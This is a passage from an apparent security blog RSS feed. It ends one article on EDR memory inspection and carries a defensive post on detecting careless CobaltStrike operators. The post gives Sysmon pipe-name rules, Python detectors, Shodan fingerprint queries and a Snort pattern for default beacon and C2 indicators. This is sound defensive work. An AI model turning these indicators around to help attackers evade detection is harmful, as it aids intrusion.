<p>Furthermore, memory inspection can provide context and behavioral analysis, helping to identify patterns of malicious behavior and uncover advanced persistent threats (APTs) that may be evading other security mechanisms. For example, EDR solutions with memory inspection capabilities can detect attempts to modify critical system structures, such as the SSDT (System Service Descriptor Table) or the IDT (Interrupt Descriptor Table), which are common targets for hooking techniques.</p>
<p>A key constraint is that memory inspection during application runtime massively degrades usability and user experience, because scanning runtime memory requires significant processing power. Consider the runtime environment of a typical game such as Genshin Impact, which can hold close to 4GB of virtual memory: any solution trying to inspect that memory will consume significant system resources. Memory is also dynamic, and there are limits to how often you can pause an application without reducing its responsiveness, which makes it impractical to scan an application continuously.</p>
<p><img src="https://pimages.toolbox.com/wp-content/uploads/2023/04/03114908/image2-1024x379.png" alt="https://pimages.toolbox.com/wp-content/uploads/2023/04/03114908/image2-1024x379.png" /></p>
<p>NGAV, EPPs, and EDRs/XDRs can perform memory introspection. However, this is typically done within a sandbox, not in the real-time environment of endpoints.</p>
<p>Sandbox environments typically isolate potentially malicious code and execute it in a controlled environment to observe its behavior. Attackers utilizing in-memory disassembly techniques to unhook hooks in NTDLL can evade detection by traditional file-based scanning methods, as the malicious code may not be written to disk.</p>
<p>The challenge is exacerbated by the fact that a growing number of threat actors use polymorphism, packing, and obfuscation to hide their presence, including in memory. This makes the chances of catching malicious activity in runtime memory close to zero.</p>
]]></content:encoded></item><item><title><![CDATA[Detecting Amateur CobaltStrike Operators]]></title><description><![CDATA[CobaltStrike by HelpSystems is an adversary simulation tool with advanced attack and evasion strategies. While its use has gained popularity within red teams, its abuse has also been increasing with threat actors. CobaltStrike is used by sophisticat...]]></description><link>https://research.meekolab.com/detecting-amateur-cobaltstrike-operators</link><guid isPermaLink="true">https://research.meekolab.com/detecting-amateur-cobaltstrike-operators</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 02 Nov 2022 03:23:06 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1666702477890/MlOinCt_o.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>CobaltStrike by HelpSystems is an adversary simulation tool with advanced attack and evasion strategies. While its use has gained popularity within red teams, its abuse has also been increasing with threat actors. CobaltStrike is used by sophisticated groups, and even state-backed entities from <a target="_blank" href="https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda">China</a> are known to use the software to gain a foothold inside corporate and governmental institutions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666703785766/F1ZuqU4iK.png" alt="image1.png" /></p>
<p>The rise of cracked versions of CobaltStrike has further proliferated the tool among threat actors. Pirated copies of the software are very easy to come by because CobaltStrike is written in Java (to be honest, CS is easier to crack than Minecraft at this point).</p>
<p>Cobalt Strike’s popularity is mainly due to its beacons being stealthy, stable, and highly customizable. CS <a target="_blank" href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/init-access_main.htm#_Toc65482750">beacons</a> are stealthy due to in-memory execution via reflection into the memory of a process without affecting the file system. Cobalt Strike’s <a target="_blank" href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_main.htm">post-exploitation suite</a> includes support for keylogging, command execution, credential dumping, file transfer, port scanning, and more. <a target="_blank" href="https://www.cobaltstrike.com/help-malleable-c2">Malleable C2</a> allows attackers to change how its beacons look and mimic other legitimate traffic to stay ahead of network intrusion detection systems.</p>
<p>While there are no one-stop solutions for detecting and preventing CobaltStrike, given how customizable it is, there are several ways to spot adversaries that are less careful in how they implement their attacks.</p>
<h3 id="heading-trial-version-deficiencies">Trial Version Deficiencies</h3>
<p><a target="_blank" href="https://www.cobaltstrike.com/offensive-security-advanced-bundle-trial/">Evaluation</a> copies of CobaltStrike are not the most common thing to encounter, but they do show up because CobaltStrike users span a wide range of technical skill. The trial version embeds a lot of default values so that it is easily detected inside production infrastructure, which makes sure the evaluation version isn’t abused for professional or adversarial work.</p>
<p>Using its infamous Malleable C2 profiles, CobaltStrike tags each HTTP GET transaction from the trial version with an X-Malware header containing the EICAR test string, a nod to the <a target="_blank" href="https://www.ietf.org/rfc/rfc3514.txt">RFC 3514</a> “evil bit”, an IPv4 flag that lets traffic mark itself as malicious. The EICAR string is also present in the Java Applet attacks that ship with the CobaltStrike trial version, with the EICAR file embedded inside the jar.</p>
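<p>A check for that header is easy to bolt onto anything that already parses HTTP requests. The sketch below is a minimal example that assumes the request headers are available as a plain dictionary; the function name <code>is_trial_get_request</code> and the shortened sample value are illustrative only.</p>
<pre><code class="lang-python">EICAR_MARKER = "EICAR-STANDARD-ANTIVIRUS-TEST-FILE"


def is_trial_get_request(method, headers):
    """Flag HTTP GET requests that carry the trial's X-Malware header."""
    # Header names are case-insensitive, so normalise them before the lookup.
    lowered = {name.lower(): value for name, value in headers.items()}
    value = lowered.get("x-malware", "")
    return method.upper() == "GET" and EICAR_MARKER in value


# Shortened sample value: only the marker substring matters for this check.
sample = {"Host": "example.com", "X-Malware": "...$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"}
print(is_trial_get_request("GET", sample))                   # True
print(is_trial_get_request("GET", {"Host": "example.com"}))  # False
</code></pre>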
<p>CobaltStrike’s Artifact Kit, which generates executables and DLLs that smuggle payloads past some AV/EDR products, is also modified in the trial version. There, the Artifact Kit embeds CobaltStrike’s stager shellcode into executables and DLLs with no steps to disrupt an AV/EDR sandbox system.</p>
<h3 id="heading-dns-labels">DNS Labels</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666703740392/XVGQaFVXc.jpg" alt="EmnIZnfXcAAG2rM-large.jpg" /></p>
<p>In late 2020, the entirety of CobaltStrike’s 4.0 source code was leaked onto GitHub. The source code reveals that Cobalt Strike uses three unique DNS labels: <code>cdn</code> for A records, <code>api</code> for TXT records, and <code>www6</code> for AAAA records. With this you can build custom detection rules in your IPS/IDS solution to flag these DNS requests for further investigation.</p>
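<p>As a starting point, the label-to-record mapping can be expressed as a small lookup. This is only a sketch: the function name <code>is_default_cs_dns_query</code> is hypothetical, the query is assumed to arrive as a name plus a record type string, and since labels like <code>cdn</code> and <code>api</code> are common on legitimate domains a hit should be treated as a reason to look closer, not as a verdict.</p>
<pre><code class="lang-python">DEFAULT_LABELS = {"cdn": "A", "api": "TXT", "www6": "AAAA"}


def is_default_cs_dns_query(qname, qtype):
    """True if the first label and record type match one of the default pairs."""
    first_label = qname.rstrip(".").split(".")[0].lower()
    return DEFAULT_LABELS.get(first_label) == qtype.upper()


print(is_default_cs_dns_query("www6.1a2b3c.example.com.", "AAAA"))  # True
print(is_default_cs_dns_query("api.example.com", "A"))              # False
</code></pre>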
<h3 id="heading-named-pipes">Named Pipes</h3>
<p>Named pipes are essential to the operation of Cobalt Strike beacons, as they are used for AV evasion, lateral movement, communications between multiple beacons, and various post-exploitation activities. Before version 4.2, CobaltStrike didn’t allow operators to change the default naming scheme of named pipes.</p>
<p>A blog post by HelpSystems gives an overview of named pipes and explains how operators should change the default values for OPSEC reasons. However, because less-sophisticated threat actors are getting their hands on the software, there is an opportunity to stop some attacks by deploying Sysmon detection rules for the default CobaltStrike pipe names.</p>
<pre><code class="lang-c">&lt;PipeName condition=<span class="hljs-string">"contains all"</span>&gt;MSSE-;-server&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\postex_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\postex_ssh_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\status_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mojo<span class="hljs-number">.5688</span><span class="hljs-number">.8052</span><span class="hljs-number">.183894939787088877</span>&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mojo<span class="hljs-number">.5688</span><span class="hljs-number">.8052</span><span class="hljs-number">.35780273329370473</span>&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mypipe-f&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\mypipe-h&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\windows.update.manager&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\msagent_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\DserNamePipe&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\Intsvcs_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\scerpc_&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\scerpc&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\ntsvcs&lt;/PipeName&gt;
&lt;PipeName condition=<span class="hljs-string">"begin with"</span>&gt;\wkssvc&lt;/PipeName&gt;
</code></pre>
<p>These detection rules are able to catch a large portion of CobaltStrike attacks that are configured with default values, perhaps thanks to many individuals not reading the instructions. Below is a Sysmon event ID 17 for a CobaltStrike SMB beacon pipe.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1666699272690/4Zd_55hVJ.png" alt="image20-EID17-18-pipeevednts.png" /></p>
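<p>The same defaults can be checked outside of Sysmon, for example when triaging exported pipe events. The sketch below covers only a subset of the rules above; the function name <code>is_default_cs_pipe</code> is hypothetical, and lower-casing the pipe name before matching is my own choice here.</p>
<pre><code class="lang-python">BEGINS_WITH = (
    "\\postex_",      # also covers \postex_ssh_
    "\\status_",
    "\\msagent_",
    "\\mypipe-f",
    "\\mypipe-h",
    "\\windows.update.manager",
)


def is_default_cs_pipe(pipe_name):
    """Match a pipe name against a subset of the default CobaltStrike names."""
    name = pipe_name.lower()
    # Mirrors the "contains all" rule: both fragments must be present.
    if "msse-" in name and "-server" in name:
        return True
    return name.startswith(BEGINS_WITH)


print(is_default_cs_pipe("\\MSSE-1234-server"))  # True
print(is_default_cs_pipe("\\postex_ssh_4f3a"))   # True
print(is_default_cs_pipe("\\lsass"))             # False
</code></pre>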
<h3 id="heading-abnormal-login-events">Abnormal Login Events</h3>
<p>Lateral movement using Cobalt Strike (and other offensive tools) can also generate abnormal Windows login events. One example of a detection strategy would be to look for <a target="_blank" href="https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4624">event ID 4624</a> in the Windows Security log, with a LogonType value of 9 (NewCredentials — A caller cloned its current token and specified new credentials for outbound connections, and the new logon session has the same local identity, but uses different credentials for other network connections).</p>
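<p>If the Security log has already been exported to structured records, the filter itself is short. This sketch assumes each event is a dictionary using the standard 4624 field names (<code>EventID</code>, <code>LogonType</code>, <code>TargetUserName</code>); the sample records and the helper name <code>is_new_credentials_logon</code> are made up for illustration.</p>
<pre><code class="lang-python">def is_new_credentials_logon(event):
    """True for Security event 4624 with LogonType 9 (NewCredentials)."""
    # Compare as strings so both integer and string exports are handled.
    return str(event.get("EventID")) == "4624" and str(event.get("LogonType")) == "9"


events = [
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "alice"},
    {"EventID": 4624, "LogonType": 9, "TargetUserName": "bob"},
    {"EventID": 4634, "LogonType": 9, "TargetUserName": "carol"},
]
hits = [e["TargetUserName"] for e in events if is_new_credentials_logon(e)]
print(hits)  # ['bob']
</code></pre>
<p>LogonType 9 also appears with legitimate <code>runas /netonly</code> usage, so the hits are candidates for review and not confirmed lateral movement.</p>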
<h3 id="heading-beacon-traffic-detection">Beacon Traffic Detection</h3>
<p>CobaltStrike beacons are customizable with many public and private configurations existing to hide potential traffic from network monitors. By default a CobaltStrike beacon will check into a server every 60 seconds, but this can be changed to add connection jitters in order to mimic real network connections. However, many less sophisticated threat-actors don’t customize beacon traffic sufficiently to avoid detection.</p>
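<p>One simple way to look for un-jittered check-ins is to measure how regular the gaps between connections are. The sketch below uses the coefficient of variation of those gaps; the function name <code>looks_like_beacon</code> and the <code>0.1</code> threshold are assumptions chosen for illustration and would need tuning against real traffic.</p>
<pre><code class="lang-python">from statistics import mean, pstdev


def looks_like_beacon(timestamps, max_variation=0.1):
    """Flag connection times (in seconds) whose spacing is suspiciously regular."""
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    if len(gaps) in (0, 1, 2):
        return False  # too few samples to say anything
    average = mean(gaps)
    if average == 0:
        return False
    # Coefficient of variation: spread of the gaps relative to their mean.
    variation = pstdev(gaps) / average
    # Equivalent to "variation is at most max_variation".
    return min(variation, max_variation) == variation


print(looks_like_beacon([0, 60, 120, 181, 240]))   # True
print(looks_like_beacon([0, 5, 300, 310, 2000]))   # False
</code></pre>
<p>A beacon configured with heavy jitter will slip past a threshold this tight, which is why this only helps against operators who leave the defaults in place.</p>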
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1667358786871/AfX4fLGhM.png" alt="Screenshot 2022-10-25 at 13.19.18.png" /></p>
<p>One default configuration characteristic for detecting CobaltStrike beacons is the URL string <code>/submit.php?id=[9-10 digit string]</code>. This string is observable in HTTP POST communications when using some cracked or trial versions of CobaltStrike, which may not include all of the features of a licensed and updated version.</p>
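<p>That URL shape translates directly into a regular expression. A minimal sketch, assuming the request method and URI have already been extracted from proxy or IDS logs; the name <code>is_default_submit_uri</code> is hypothetical.</p>
<pre><code class="lang-python">import re

# /submit.php?id= followed by a 9 or 10 digit identifier
SUBMIT_URI = re.compile(r"^/submit\.php\?id=\d{9,10}$")


def is_default_submit_uri(method, uri):
    """True for HTTP POST requests to the default submit URI."""
    return method.upper() == "POST" and SUBMIT_URI.match(uri) is not None


print(is_default_submit_uri("POST", "/submit.php?id=123456789"))  # True
print(is_default_submit_uri("POST", "/submit.php?id=1234"))       # False
</code></pre>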
<h3 id="heading-c2-server-detection">C2 Server Detection</h3>
<p>There are various publicly known methods for identifying CobaltStrike C2 Servers:</p>
<ul>
<li>The default controller port for the CobaltStrike Team Server is <code>50050/TCP</code>, a port not usually open on other servers. Searching Shodan for <code>port:50050</code> can surface CobaltStrike control ports, but hits can still be false positives.</li>
<li>CobaltStrike's JARM signature (JARM is a tool by <a target="_blank" href="https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a/">Salesforce</a> to fingerprint TLS servers) can be searched on Shodan with the query <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code>; however, this method can also produce <a target="_blank" href="https://www.vanimpe.eu/2021/09/14/identify-malicious-servers-cobalt-strike-servers-with-jarm/">false positives</a>.</li>
<li>Cobalt Strike servers are shipped with a default security certificate that can be used to fingerprint them unless the administrator changes it. If you search Shodan for <code>ssl.cert.serial:146473198</code> you can identify servers making use of this default SSL certificate.</li>
<li>There is an extraneous space in the HTTP server response of NanoHTTPD servers that is visible even on Malleable C2 team servers. This bug is present in CobaltStrike versions below 3.13, which are the versions commonly used in many cracked copies. This can be rolled into a Snort rule with the PCRE <code>/^HTTP/1.1 200 OK \r\nContent-Type: [^\r\n]{0,100}\r\nDate: [^\r\n]{0,100} GMT\r\n(Content-Length: \d+\r\n)\r\n/</code>.</li>
</ul>
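<p>The extraneous-space check from the last item can be tried offline against captured responses. The sketch below reuses the pattern from the list as a Python bytes regex; the helper name <code>has_nanohttpd_space</code> and the sample responses are made up for illustration.</p>
<pre><code class="lang-python">import re

# Note the space between "OK" and the CRLF: that is the anomaly being matched.
EXTRA_SPACE = re.compile(
    rb"^HTTP/1.1 200 OK \r\n"
    rb"Content-Type: [^\r\n]{0,100}\r\n"
    rb"Date: [^\r\n]{0,100} GMT\r\n"
    rb"(Content-Length: \d+\r\n)\r\n"
)


def has_nanohttpd_space(response):
    """True if the raw HTTP response starts with the telltale status line and headers."""
    return EXTRA_SPACE.match(response) is not None


headers = b"Content-Type: text/plain\r\nDate: Tue, 25 Oct 2022 06:19:18 GMT\r\nContent-Length: 0\r\n\r\n"
print(has_nanohttpd_space(b"HTTP/1.1 200 OK \r\n" + headers))  # True
print(has_nanohttpd_space(b"HTTP/1.1 200 OK\r\n" + headers))   # False
</code></pre>
<p>Because the pattern also pins the header order, it stays fairly specific to this server implementation, but as with the other fingerprints here a match is a lead to investigate and not proof.</p>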
<h3 id="heading-conclusion">Conclusion</h3>
<p>CobaltStrike represents a more advanced progression of adversary tools from the days of Metasploit Framework (CobaltStrike’s creator, Raphael Mudge, actually made Armitage, a GUI for msfconsole that morphed into CobaltStrike). As new systems to tackle attacks are developed, more sophisticated tools are developed to dismantle them in a perpetual arms race.</p>
<p>Despite the advent of these more advanced tools, many adversaries, especially the less technically savvy ones, still forget to harden their payloads against certain detection techniques. A large share of threat actors also use cracked versions of CobaltStrike, which gives blue teams an opening to detect certain patterns, such as the information leaks in outdated beacon systems.</p>
<p>While CobaltStrike provides a lot of leeway in its default configurations, for example default pipe names that mimic common Windows services, it’s still easy to spot the pattern in attacks that rely on these default values.</p>
]]></content:encoded></item></channel></rss>